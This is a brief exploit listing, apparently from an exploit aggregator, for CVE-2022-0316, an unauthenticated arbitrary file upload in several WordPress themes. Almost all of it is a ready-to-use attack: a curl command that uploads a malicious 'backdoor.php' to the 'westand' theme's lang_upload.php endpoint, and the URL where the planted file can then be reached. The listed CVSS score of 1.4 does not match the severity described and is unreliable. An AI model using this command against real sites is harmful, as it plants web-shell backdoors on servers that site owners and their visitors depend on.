Exploit for Multiple themes - Unauthenticated Arbitrary File Upload CVE-2022-0316

Name: Exploit for Multiple themes - Unauthenticated Arbitrary File Upload CVE-2022-0316
Rating: 5 (58 reviews)

2022-12-29 | CVSS 1.4

## https://sploitus.com/exploit?id=WPEX-ID:9AB3D6CF-AAD7-41BC-9AAE-DC5313F12F7C
Create a malicious file "backdoor.php", then curl https://website.com/wp-content/themes/westand/include/lang_upload.php -F "mofile[]=@backdoor.php"

The file will be at https://example.com/wp-content/themes/westand/languages/backdoor.php